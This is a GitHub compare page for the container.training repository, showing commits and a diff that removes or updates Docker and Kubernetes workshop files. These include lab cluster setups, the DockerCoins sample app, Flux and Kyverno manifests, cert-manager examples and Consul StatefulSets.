Compare commits

..

10 Commits

Author SHA1 Message Date
Jerome Petazzoni
8ef6219295 fix-redirects.sh: adding forced redirect 2020-04-07 16:48:42 -05:00
Bridget Kromhout
346ce0e15c Merge pull request #304 from bridgetkromhout/devopsdaysmsp2018
testing changes for 90min
2018-07-10 18:03:16 -05:00
Bridget Kromhout
964d936435 Merge branch 'devopsdaysmsp2018' into devopsdaysmsp2018 2018-07-10 07:47:09 -05:00
Bridget Kromhout
546d9a2986 Testing redirect 2018-07-10 07:45:55 -05:00
Bridget Kromhout
8e5d27b185 changing redirects back 2018-07-10 07:40:49 -05:00
Bridget Kromhout
e8d9e94b72 First pass at edits for 90min workshop 2018-07-10 07:37:39 -05:00
Bridget Kromhout
ca980de2fd Merge branch 'master' of github.com:bridgetkromhout/container.training into devopsdaysmsp2018 2018-07-10 07:36:05 -05:00
Bridget Kromhout
4b2b5ff7e4 Merge pull request #303 from jpetazzo/master
bringing branch up to date
2018-07-10 07:34:08 -05:00
Bridget Kromhout
64fb407e8c Merge pull request #299 from bridgetkromhout/devopsdaysmsp2018
devopsdays MSP 2018-specific stuff
2018-07-06 16:04:20 -05:00
Bridget Kromhout
ea4f46599d Adding devopsdays MSP 2018 2018-07-06 16:02:02 -05:00
906 changed files with 9079 additions and 127564 deletions

View File

@@ -1,26 +0,0 @@
{
"name": "container.training environment to get started with Docker and/or Kubernetes",
"image": "ghcr.io/jpetazzo/shpod",
"features": {
//"ghcr.io/devcontainers/features/common-utils:2": {}
},
// Use 'forwardPorts' to make a list of ports inside the container available locally.
"forwardPorts": [],
//"postCreateCommand": "... install extra packages...",
"postStartCommand": "dind.sh ; kind.sh",
// This lets us use "docker-outside-docker".
// Unfortunately, minikube, kind, etc. don't work very well that way;
// so for now, we'll likely use "docker-in-docker" instead (with a
// privilege dcontainer). But we're still exposing that socket in case
// someone wants to do something interesting with it.
"mounts": ["source=/var/run/docker.sock,target=/var/run/docker-host.sock,type=bind"],
// This is for docker-in-docker.
"privileged": true,
// Uncomment to connect as root instead. More info: https://aka.ms/dev-containers-non-root.
"remoteUser": "k8s"
}

32
.gitignore vendored
View File

@@ -1,35 +1,13 @@
*.pyc
*.swp
*~
**/terraform.tfstate
**/terraform.tfstate.backup
prepare-labs/terraform/lab-environments
prepare-labs/terraform/many-kubernetes/one-kubernetes-config/config.tf
prepare-labs/terraform/many-kubernetes/one-kubernetes-module/*.tf
prepare-labs/terraform/tags
prepare-labs/terraform/virtual-machines/openstack/*.tfvars
prepare-labs/terraform/virtual-machines/proxmox/*.tfvars
prepare-labs/www
prepare-vms/ips.txt
prepare-vms/ips.html
prepare-vms/ips.pdf
prepare-vms/settings.yaml
prepare-vms/tags
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
slides/_academy_*
slides/fragments
node_modules
### macOS ###
# General
.DS_Store
.AppleDouble
.LSOverride
### Windows ###
# Windows thumbnail cache files
Thumbs.db
ehthumbs.db
ehthumbs_vista.db

View File

@@ -39,7 +39,7 @@ your own tutorials.
All these materials have been gathered in a single repository
because they have a few things in common:
- some [shared slides](slides/shared/) that are re-used
- some [common slides](slides/common/) that are re-used
(and updated) identically between different decks;
- a [build system](slides/) generating HTML slides from
Markdown source files;
@@ -199,7 +199,7 @@ this section is for you!
locked-down computer, host firewall, etc.
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
prevent you from losing your place if you get disconnected from servers.
prevent you from loosing your place if you get disconnected from servers.
https://tmux.github.io
- Forget to print "cards" and cut them up for handing out IP's.
- Forget to have fun and focus on your students!

View File

@@ -1,9 +0,0 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout

View File

@@ -1,3 +0,0 @@
hostname frr
ip nht resolve-via-default
log stdout

View File

@@ -1,40 +0,0 @@
version: "3"
services:
bgpd:
image: frrouting/frr:v8.2.2
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
cap_add:
- NET_ADMIN
- SYS_ADMIN
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel --no_zebra
restart: always
zebra:
image: frrouting/frr:v8.2.2
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
cap_add:
- NET_ADMIN
- SYS_ADMIN
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: frrouting/frr:v8.2.2
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh
chmod:
image: alpine
volumes:
- ./run:/var/run/frr
command: chmod 777 /var/run/frr

View File

@@ -1,29 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.9
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-scheduler --master http://localhost:8080

View File

@@ -1,128 +0,0 @@
---
apiVersion: |+
Make sure you update the line with --master=http://X.X.X.X:8080 below.
Then remove this section from this YAML file and try again.
---
apiVersion: v1
kind: ConfigMap
metadata:
name: kube-router-cfg
namespace: kube-system
labels:
k8s-app: kube-router
data:
cni-conf.json: |
{
"cniVersion":"0.3.0",
"name":"mynet",
"plugins":[
{
"name":"kubernetes",
"type":"bridge",
"bridge":"kube-bridge",
"isDefaultGateway":true,
"ipam":{
"type":"host-local"
}
}
]
}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
labels:
k8s-app: kube-router
name: kube-router
namespace: kube-system
spec:
selector:
matchLabels:
k8s-app: kube-router
template:
metadata:
labels:
k8s-app: kube-router
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ''
spec:
serviceAccountName: kube-router
containers:
- name: kube-router
image: docker.io/cloudnativelabs/kube-router
imagePullPolicy: Always
args:
- "--run-router=true"
- "--run-firewall=true"
- "--run-service-proxy=true"
- "--master=http://X.X.X.X:8080"
env:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
- name: KUBE_ROUTER_CNI_CONF_FILE
value: /etc/cni/net.d/10-kuberouter.conflist
livenessProbe:
httpGet:
path: /healthz
port: 20244
initialDelaySeconds: 10
periodSeconds: 3
resources:
requests:
cpu: 250m
memory: 250Mi
securityContext:
privileged: true
volumeMounts:
- name: lib-modules
mountPath: /lib/modules
readOnly: true
- name: cni-conf-dir
mountPath: /etc/cni/net.d
initContainers:
- name: install-cni
image: busybox
imagePullPolicy: Always
command:
- /bin/sh
- -c
- set -e -x;
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
if [ -f /etc/cni/net.d/*.conf ]; then
rm -f /etc/cni/net.d/*.conf;
fi;
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
cp /etc/kube-router/cni-conf.json ${TMP};
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
fi
volumeMounts:
- mountPath: /etc/cni/net.d
name: cni-conf-dir
- mountPath: /etc/kube-router
name: kube-router-cfg
hostNetwork: true
tolerations:
- key: CriticalAddonsOnly
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists
- effect: NoSchedule
key: node.kubernetes.io/not-ready
operator: Exists
volumes:
- name: lib-modules
hostPath:
path: /lib/modules
- name: cni-conf-dir
hostPath:
path: /etc/cni/net.d
- name: kube-router-cfg
configMap:
name: kube-router-cfg

View File

@@ -1,31 +0,0 @@
# Note: hyperkube isn't available after Kubernetes 1.18.
# So we'll have to update this for Kubernetes 1.19!
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.9
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-scheduler --master http://localhost:8080

View File

@@ -1,72 +0,0 @@
# (1) Setting up a registry, and telling Tilt to use it.
# Tilt needs a registry to store images.
# The following manifest defines a Deployment to run a basic Docker registry,
# and a NodePort Service to access it. Using a NodePort means that we don't
# need to obtain a TLS certificate, because we will be accessing the registry
# through localhost.
k8s_yaml('../k8s/tilt-registry.yaml')
# Tell Tilt to use the registry that we just deployed instead of whatever
# is defined in our Kubernetes resources. Tilt will patch image names to
# use our registry.
default_registry('localhost:30555')
# Create a port forward so that we can access the registry from our local
# environment, too. Note that if you run Tilt directly from a Kubernetes node
# (which is not typical, but might happen in some lab/training environments)
# the following might cause an error because port 30555 is already taken.
k8s_resource(workload='tilt-registry', port_forwards='30555:5000')
# (2) Telling Tilt how to build and run our app.
# The following two lines will use the kubectl-build plugin
# to leverage buildkit and build the images in our Kubernetes
# cluster. This is not enabled by default, because it requires
# the plugin to be installed.
# See https://github.com/vmware-tanzu/buildkit-cli-for-kubectl
# for more information about this plugin.
#load('ext://kubectl_build', 'kubectl_build')
#docker_build = kubectl_build
# Our Kubernetes manifests use images 'dockercoins/...' so we tell Tilt
# how each of these images should be built. The first argument is the name
# of the image, the second argument is the directory containing the build
# context (i.e. the Dockerfile to build the image).
docker_build('dockercoins/hasher', 'hasher')
docker_build('dockercoins/rng', 'rng')
docker_build('dockercoins/webui', 'webui')
docker_build('dockercoins/worker', 'worker')
# The following manifests defines five Deployments and four Services for
# our application.
k8s_yaml('../k8s/dockercoins.yaml')
# (3) Finishing touches.
# The following line lets Tilt run with the default kubeadm cluster-admin context.
allow_k8s_contexts('kubernetes-admin@kubernetes')
# Note: the whole section below (to set up ngrok tunnels) is disabled,
# because ngrok now requires to set up an account to serve HTML
# content. So we can still use ngrok for e.g. webhooks and "raw" APIs,
# but not to serve web pages like the Tilt UI.
# # This will run an ngrok tunnel to expose Tilt to the outside world.
# # This is intended to be used when Tilt runs on a remote machine.
# local_resource(name='ngrok:tunnel', serve_cmd='ngrok http 10350')
# # This will wait until the ngrok tunnel is up, and show its URL to the user.
# # We send the output to /dev/tty so that it doesn't get intercepted by
# # Tilt, and gets displayed to the user's terminal instead.
# # Note: this assumes that the ngrok instance will be running on port 4040.
# # If you have other ngrok instances running on the machine, this might not work.
# local_resource(name='ngrok:showurl', cmd='''
# while sleep 1; do
# TUNNELS=$(curl -fsSL http://localhost:4040/api/tunnels | jq -r .tunnels[].public_url)
# [ "$TUNNELS" ] && break
# done
# printf "\nYou should be able to connect to the Tilt UI with the following URL(s): %s\n" "$TUNNELS" >/dev/tty
# '''
# )

View File

@@ -1,24 +1,26 @@
services:
version: "2"
services:
rng:
build: rng
ports:
- "8001:80"
- "8001:80"
hasher:
build: hasher
ports:
- "8002:80"
- "8002:80"
webui:
build: webui
ports:
- "8000:80"
- "8000:80"
volumes:
- "./webui/files/:/files/"
- "./webui/files/:/files/"
redis:
image: redis
worker:
build: worker

View File

@@ -1,8 +1,10 @@
FROM ruby:alpine
WORKDIR /app
RUN apk add --update build-base curl
RUN gem install sinatra --version '~> 3'
RUN gem install sinatra
RUN gem install thin
COPY hasher.rb .
CMD ["ruby", "hasher.rb", "-o", "::"]
ADD hasher.rb /
CMD ["ruby", "hasher.rb"]
EXPOSE 80
HEALTHCHECK \
--interval=1s --timeout=2s --retries=3 --start-period=1s \
CMD curl http://localhost/ || exit 1

View File

@@ -2,6 +2,7 @@ require 'digest'
require 'sinatra'
require 'socket'
set :bind, '0.0.0.0'
set :port, 80
post '/' do

View File

@@ -1,7 +1,5 @@
FROM python:alpine
WORKDIR /app
RUN pip install Flask
COPY rng.py .
ENV FLASK_APP=rng FLASK_RUN_HOST=:: FLASK_RUN_PORT=80
CMD ["flask", "run", "--without-threads"]
COPY rng.py /
CMD ["python", "rng.py"]
EXPOSE 80

View File

@@ -28,5 +28,5 @@ def rng(how_many_bytes):
if __name__ == "__main__":
app.run(port=80)
app.run(host="0.0.0.0", port=80, threaded=False)

View File

@@ -1,8 +1,7 @@
FROM node:23-alpine
WORKDIR /app
FROM node:4-slim
RUN npm install express
RUN npm install morgan
RUN npm install redis@5
COPY . .
RUN npm install redis
COPY files/ /files/
COPY webui.js /
CMD ["node", "webui.js"]
EXPOSE 80

View File

@@ -13,7 +13,7 @@
color: royalblue;
}
</style>
<script src="jquery-1.11.3.min.js"></script>
<script src="jquery.js"></script>
<script src="d3.min.js"></script>
<script src="rickshaw.min.js"></script>
<script>

1
dockercoins/webui/files/jquery.js vendored Symbolic link
View File

@@ -0,0 +1 @@
jquery-1.11.3.min.js

View File

@@ -1,34 +1,26 @@
import express from 'express';
import morgan from 'morgan';
import { createClient } from 'redis';
var client = await createClient({
url: "redis://redis",
socket: {
family: 0
}
})
.on("error", function (err) {
console.error("Redis error", err);
})
.connect();
var express = require('express');
var app = express();
var redis = require('redis');
app.use(morgan('common'));
var client = redis.createClient(6379, 'redis');
client.on("error", function (err) {
console.error("Redis error", err);
});
app.get('/', function (req, res) {
res.redirect('/index.html');
});
app.get('/json', async(req, res) => {
var coins = await client.hLen('wallet');
var hashes = await client.get('hashes');
var now = Date.now() / 1000;
res.json({
coins: coins,
hashes: hashes,
now: now
app.get('/json', function (req, res) {
client.hlen('wallet', function (err, coins) {
client.get('hashes', function (err, hashes) {
var now = Date.now() / 1000;
res.json( {
coins: coins,
hashes: hashes,
now: now
});
});
});
});

View File

@@ -1,6 +1,5 @@
FROM python:alpine
WORKDIR /app
RUN pip install redis
RUN pip install requests
COPY worker.py .
COPY worker.py /
CMD ["python", "worker.py"]

View File

@@ -2,14 +2,14 @@ version: "2"
services:
elasticsearch:
image: elasticsearch:2
image: elasticsearch
# If you need to access ES directly, just uncomment those lines.
#ports:
# - "9200:9200"
# - "9300:9300"
logstash:
image: logstash:2
image: logstash
command: |
-e '
input {
@@ -47,7 +47,7 @@ services:
- "12201:12201/udp"
kibana:
image: kibana:4
image: kibana
ports:
- "5601:5601"
environment:

View File

@@ -1,9 +0,0 @@
apiVersion: v1
kind: ConfigMap
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
data:
use-forwarded-headers: true
compute-full-forwarded-for: true
use-proxy-protocol: true

View File

@@ -1,10 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: ingress-nginx

View File

@@ -1,12 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- M6-ingress-nginx-components.yaml
- sync.yaml
patches:
- path: M6-ingress-nginx-cm-patch.yaml
target:
kind: ConfigMap
- path: M6-ingress-nginx-svc-patch.yaml
target:
kind: Service

View File

@@ -1,8 +0,0 @@
apiVersion: v1
kind: Service
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
annotations:
service.beta.kubernetes.io/scw-loadbalancer-proxy-protocol-v2: true
service.beta.kubernetes.io/scw-loadbalancer-use-hostname: true

View File

@@ -1,10 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: kyverno

View File

@@ -1,72 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: flux-multi-tenancy
spec:
validationFailureAction: enforce
rules:
- name: serviceAccountName
exclude:
resources:
namespaces:
- flux-system
match:
resources:
kinds:
- Kustomization
- HelmRelease
validate:
message: ".spec.serviceAccountName is required"
pattern:
spec:
serviceAccountName: "?*"
- name: kustomizationSourceRefNamespace
exclude:
resources:
namespaces:
- flux-system
- ingress-nginx
- kyverno
- monitoring
- openebs
match:
resources:
kinds:
- Kustomization
preconditions:
any:
- key: "{{request.object.spec.sourceRef.namespace}}"
operator: NotEquals
value: ""
validate:
message: "spec.sourceRef.namespace must be the same as metadata.namespace"
deny:
conditions:
- key: "{{request.object.spec.sourceRef.namespace}}"
operator: NotEquals
value: "{{request.object.metadata.namespace}}"
- name: helmReleaseSourceRefNamespace
exclude:
resources:
namespaces:
- flux-system
- ingress-nginx
- kyverno
- monitoring
- openebs
match:
resources:
kinds:
- HelmRelease
preconditions:
any:
- key: "{{request.object.spec.chart.spec.sourceRef.namespace}}"
operator: NotEquals
value: ""
validate:
message: "spec.chart.spec.sourceRef.namespace must be the same as metadata.namespace"
deny:
conditions:
- key: "{{request.object.spec.chart.spec.sourceRef.namespace}}"
operator: NotEquals
value: "{{request.object.metadata.namespace}}"

View File

@@ -1,29 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: monitoring
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: grafana
namespace: monitoring
spec:
ingressClassName: nginx
rules:
- host: grafana.test.metal.mybestdomain.com
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: kube-prometheus-stack-grafana
port:
number: 80

View File

@@ -1,35 +0,0 @@
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector: {}
ingress:
- from:
- podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-webui
spec:
podSelector:
matchLabels:
app: web
ingress:
- from: []
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-db
spec:
podSelector:
matchLabels:
app: db
ingress:
- from:
- podSelector:
matchLabels:
app: web

View File

@@ -1,10 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: openebs

View File

@@ -1,12 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
namespace: openebs
resources:
- M6-openebs-components.yaml
- sync.yaml
configMapGenerator:
- name: openebs-values
files:
- values.yaml=M6-openebs-values.yaml
configurations:
- M6-openebs-kustomizeconfig.yaml

View File

@@ -1,6 +0,0 @@
nameReference:
- kind: ConfigMap
version: v1
fieldSpecs:
- path: spec/valuesFrom/name
kind: HelmRelease

View File

@@ -1,15 +0,0 @@
# helm install openebs --namespace openebs openebs/openebs
# --set engines.replicated.mayastor.enabled=false
# --set lvm-localpv.lvmNode.kubeletDir=/var/lib/k0s/kubelet/
# --create-namespace
engines:
replicated:
mayastor:
enabled: false
# Needed for k0s install since kubelet install is slightly divergent from vanilla install >:-(
lvm-localpv:
lvmNode:
kubeletDir: /var/lib/k0s/kubelet/
localprovisioner:
hostpathClass:
isDefaultClass: true

View File

@@ -1,38 +0,0 @@
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
namespace: rocky-test
name: rocky-full-access
rules:
- apiGroups: ["", extensions, apps]
resources: [deployments, replicasets, pods, services, ingresses, statefulsets]
verbs: [get, list, watch, create, update, patch, delete] # You can also use [*]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: rocky-pv-access
rules:
- apiGroups: [""]
resources: [persistentvolumes]
verbs: [get, list, watch, create, patch]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
toolkit.fluxcd.io/tenant: rocky
name: rocky-reconciler2
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: rocky-pv-access
subjects:
- apiGroup: rbac.authorization.k8s.io
kind: User
name: gotk:rocky-test:reconciler
- kind: ServiceAccount
name: rocky
namespace: rocky-test

View File

@@ -1,19 +0,0 @@
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: rocky
namespace: rocky-test
spec:
ingressClassName: nginx
rules:
- host: rocky.test.mybestdomain.com
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: web
port:
number: 80

View File

@@ -1,8 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- ../../base/rocky
patches:
- path: M6-rocky-test-patch.yaml
target:
kind: Kustomization

View File

@@ -1,7 +0,0 @@
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
name: rocky
namespace: rocky-test
spec:
path: ./k8s/plain

View File

@@ -1,8 +0,0 @@
k8s_yaml(helm(
"./path-to-chart", name="blue",
values=[], # Example: ["./path/to/values.yaml"]
set=[
"image.repository=jpetazzo/color",
"image.tag=latest",
]
))

View File

@@ -1,16 +0,0 @@
apiVersion: apiserver.config.k8s.io/v1
kind: AdmissionConfiguration
plugins:
- name: PodSecurity
configuration:
apiVersion: pod-security.admission.config.k8s.io/v1alpha1
kind: PodSecurityConfiguration
defaults:
enforce: baseline
audit: baseline
warn: baseline
exemptions:
usernames:
- cluster-admin
namespaces:
- kube-system

View File

@@ -1,33 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: blue
name: blue
spec:
replicas: 1
selector:
matchLabels:
app: blue
template:
metadata:
labels:
app: blue
spec:
containers:
- image: jpetazzo/color
name: color
---
apiVersion: v1
kind: Service
metadata:
labels:
app: blue
name: blue
spec:
ports:
- name: "80"
port: 80
selector:
app: blue

View File

@@ -1,21 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
annotations:
traefik.ingress.kubernetes.io/service-weights: |
whatever: 90%
whatever-new: 10%
spec:
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 80
- path: /
backend:
serviceName: whatever-new
servicePort: 80

View File

@@ -1,36 +0,0 @@
kind: Service
apiVersion: v1
metadata:
name: certbot
spec:
ports:
- port: 80
protocol: TCP
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: certbot
spec:
rules:
- http:
paths:
- path: /.well-known/acme-challenge/
pathType: Prefix
backend:
service:
name: certbot
port:
number: 80
---
apiVersion: v1
kind: Endpoints
metadata:
name: certbot
subsets:
- addresses:
- ip: A.B.C.D
ports:
- port: 8000
protocol: TCP

View File

@@ -1,11 +0,0 @@
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
name: xyz.A.B.C.D.nip.io
spec:
secretName: xyz.A.B.C.D.nip.io
dnsNames:
- xyz.A.B.C.D.nip.io
issuerRef:
name: letsencrypt-staging
kind: ClusterIssuer

View File

@@ -1,18 +0,0 @@
apiVersion: cert-manager.io/v1
kind: ClusterIssuer
metadata:
name: letsencrypt-staging
spec:
acme:
# Remember to update this if you use this manifest to obtain real certificates :)
email: hello@example.com
server: https://acme-staging-v02.api.letsencrypt.org/directory
# To use the production environment, use the following line instead:
#server: https://acme-v02.api.letsencrypt.org/directory
privateKeySecretRef:
name: issuer-letsencrypt-staging
solvers:
- http01:
ingress:
class: traefik

View File

@@ -1,18 +0,0 @@
# Note: apiextensions.k8s.io/v1beta1 is deprecated, and won't be served
# in Kubernetes 1.22 and later versions. This YAML manifest is here just
# for reference, but it's not intended to be used in modern trainings.
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
version: v1alpha1
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof

View File

@@ -1,21 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof

View File

@@ -1,37 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
required: [ spec ]
properties:
spec:
type: object
properties:
taste:
description: Subjective taste of that kind of coffee bean
type: string
required: [ taste ]
additionalPrinterColumns:
- jsonPath: .spec.taste
description: Subjective taste of that kind of coffee bean
name: Taste
type: string
- jsonPath: .metadata.creationTimestamp
name: Age
type: date

View File

@@ -1,34 +0,0 @@
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: arabica
spec:
taste: strong
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: excelsa
spec:
taste: fruity
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: liberica
spec:
taste: smoky
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: robusta
spec:
taste: stronger
bitterness: high
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: java

View File

@@ -1,78 +0,0 @@
# Basic Consul cluster using Cloud Auto-Join.
# Caveats:
# - no actual persistence
# - scaling down to 1 will break the cluster
# - pods may be colocated
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
containers:
- name: consul
image: "consul:1.11"
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"

View File

@@ -1,89 +0,0 @@
# Better Consul cluster.
# There is still no actual persistence, but:
# - podAntiaffinity prevents pod colocation
# - clusters works when scaling down to 1 (thanks to lifecycle hook)
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchLabels:
app: consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.11"
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command: [ "sh", "-c", "consul leave" ]

View File

@@ -1,99 +0,0 @@
# Even better Consul cluster.
# That one uses a volumeClaimTemplate to achieve true persistence.
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchLabels:
app: consul
topologyKey: kubernetes.io/hostname
